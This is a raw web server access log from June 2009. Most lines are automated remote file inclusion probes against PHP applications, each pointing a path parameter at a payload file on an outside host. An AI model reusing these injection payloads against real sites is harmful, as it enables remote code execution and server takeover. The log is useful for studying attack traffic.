83.98.209.71 - - [27/Jun/2009:12:23:18 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:12:23:21 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 194920 "-""libwww-perl/5.79"
217.147.29.190 - - [27/Jun/2009:12:23:28 -0500] "GET /logs/access_log.1240272000/index2.php?p=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:23:36 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:23:36 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:23:36 -0500] "GET /logs/access_log.1237680000//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:24:35 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:24:35 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:24:35 -0500] "GET /logs/access_log.1237680000//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.38.136.16 - - [27/Jun/2009:12:25:57 -0500] "GET /logs/access_log.1228694400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:25:57 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:26:00 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 194918 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:26:02 -0500] "GET /logs/access_log.1228694400///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:26:02 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
218.38.136.16 - - [27/Jun/2009:12:26:04 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/left.txt??? HTTP/1.1" 200 194918 "-""libwww-perl/5.79"
211.189.18.73 - - [27/Jun/2009:12:26:19 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:12:26:40 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:28:12 -0500] "GET /logs/access_log.1232150400/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:28:12 -0500] "GET /?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:28:13 -0500] "GET /logs/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 200 194912 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.98.209.71 - - [27/Jun/2009:12:28:25 -0500] "GET /logs/access_log.1239148800/?_zb_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.55.208.137 - - [27/Jun/2009:12:29:07 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:12:29:23 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:29:23 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:29:23 -0500] "GET /logs/access_log.1239926400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:29:51 -0500] "GET /logs/access_log.1241654400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET /logs/access_log.1240012800//include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET /logs/access_log.1240012800//include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:10 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.203.180.144 - - [27/Jun/2009:12:31:41 -0500] "GET /logs/access_log.1239062400//include/print_category.php?setup[use_category]=1&dir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:31:46 -0500] "GET /logs/access_log.1232150400/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:31:46 -0500] "GET /?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:31:47 -0500] "GET /logs/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [27/Jun/2009:12:31:56 -0500] "GET /logs/access_log.1239148800/?_zb_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.17.99.13 - - [27/Jun/2009:12:32:28 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:12:32:28 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.826"
211.206.120.187 - - [27/Jun/2009:12:38:25 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:12:38:25 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:12:38:26 -0500] "GET //bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
65.55.106.146 - - [27/Jun/2009:12:39:30 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:12:39:38 -0500] "GET /logs/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:38 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:38 -0500] "GET /errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:39 -0500] "GET /errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:39 -0500] "GET /logs/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:39 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:45 -0500] "GET /errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:46 -0500] "GET /logs/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:39:46 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:12:39:47 -0500] "GET /logs/access_log.1240963200//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:40:12 -0500] "GET /logs/access_log.1235779200/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:40:12 -0500] "GET /logs/errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:12:40:12 -0500] "GET /errors.php?error=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.208.120 - - [27/Jun/2009:12:42:09 -0500] "GET /logs/access_log.1222473600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [27/Jun/2009:12:45:41 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [27/Jun/2009:12:45:41 -0500] "GET /logs/access_log.1207094400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.131.116.12 - - [27/Jun/2009:12:46:35 -0500] "GET //components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:46:35 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:46:35 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:47:03 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:47:40 -0500] "GET //components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:47:41 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:47:42 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:12:48:23 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:51:12 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:51:12 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:12:51:12 -0500] "GET /logs/access_log.1238112000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:30 -0500] "GET /logs/access_log.1237852800//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:30 -0500] "GET //?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:30 -0500] "GET /logs//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 194917 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:43 -0500] "GET //?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:43 -0500] "GET /logs/access_log.1237852800//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:12:52:43 -0500] "GET /logs//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 200 194917 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:35 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:35 -0500] "GET /logs/access_log.1238112000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:35 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:36 -0500] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:36 -0500] "GET /logs/access_log.1238112000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:36 -0500] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:53:43 -0500] "GET /logs/access_log.1241568000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.229.183.186 - - [27/Jun/2009:12:54:21 -0500] "GET /logs/access_log.1241568000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://67.222.48.109/images/.ray/id1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
209.200.37.14 - - [27/Jun/2009:12:59:21 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.200.37.14 - - [27/Jun/2009:12:59:21 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.200.37.14 - - [27/Jun/2009:12:59:21 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.200.37.14 - - [27/Jun/2009:12:59:29 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.38.136.251 - - [27/Jun/2009:13:00:18 -0500] "GET /logs///127.0.0.1/[adminbot_path]/lib/live_status.lib.php?ROOT=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.136.251 - - [27/Jun/2009:13:00:18 -0500] "GET /logs/access_log.1241827200///127.0.0.1/[adminbot_path]/lib/live_status.lib.php?ROOT=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.38.136.251 - - [27/Jun/2009:13:00:18 -0500] "GET ///127.0.0.1/[adminbot_path]/lib/live_status.lib.php?ROOT=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.146 - - [27/Jun/2009:13:04:25 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.67.63 - - [27/Jun/2009:13:09:42 -0500] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.214.67.63 - - [27/Jun/2009:13:09:42 -0500] "GET /logs/access_log.1236384000/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.214.67.63 - - [27/Jun/2009:13:09:42 -0500] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
85.214.67.63 - - [27/Jun/2009:13:09:42 -0500] "GET /logs/access_log.1236124800/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:13:10:30 -0500] "GET /logs/access_log.1241568000/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
63.223.85.28 - - [27/Jun/2009:13:12:56 -0500] "GET //ezusermanager_pwd_forgott.php?ezUserManager_Path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
63.223.85.28 - - [27/Jun/2009:13:12:56 -0500] "GET /logs/access_log.1239667200//ezusermanager_pwd_forgott.php?ezUserManager_Path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
63.223.85.28 - - [27/Jun/2009:13:12:56 -0500] "GET /logs//ezusermanager_pwd_forgott.php?ezUserManager_Path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:13:14:04 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.65.41.165 - - [27/Jun/2009:13:14:33 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.93.48.103 - - [27/Jun/2009:13:15:27 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 341 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
65.55.106.132 - - [27/Jun/2009:13:18:55 -0500] "GET /logs/access_log.1126396800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.210.64.49 - - [27/Jun/2009:13:18:59 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
190.210.64.49 - - [27/Jun/2009:13:18:59 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
190.210.64.49 - - [27/Jun/2009:13:18:59 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:13:20:00 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:13:20:00 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:13:20:00 -0500] "GET /logs/access_log.1237680000//include/print_category.php?setup[use_category]=1&dir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
190.210.64.49 - - [27/Jun/2009:13:20:21 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.244.235.254 - - [27/Jun/2009:13:21:43 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.244.235.254 - - [27/Jun/2009:13:21:43 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.244.235.254 - - [27/Jun/2009:13:21:43 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.244.235.254 - - [27/Jun/2009:13:21:55 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:22:45 -0500] "GET //bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:22:45 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:22:45 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:22:48 -0500] "GET //bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
65.55.208.131 - - [27/Jun/2009:13:22:49 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [27/Jun/2009:13:22:49 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:22:49 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.208.131 - - [27/Jun/2009:13:22:49 -0500] "GET /logs/access_log.1143590400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [27/Jun/2009:13:22:49 -0500] "GET /logs/access_log.1203811200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [27/Jun/2009:13:22:49 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.93.48.103 - - [27/Jun/2009:13:24:16 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 341 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
195.34.78.110 - - [27/Jun/2009:13:25:00 -0500] "GET /logs/access_log.1240963200//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:25:00 -0500] "GET /logs/access_log.1240963200//bbs/outlogin.php?_zb_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
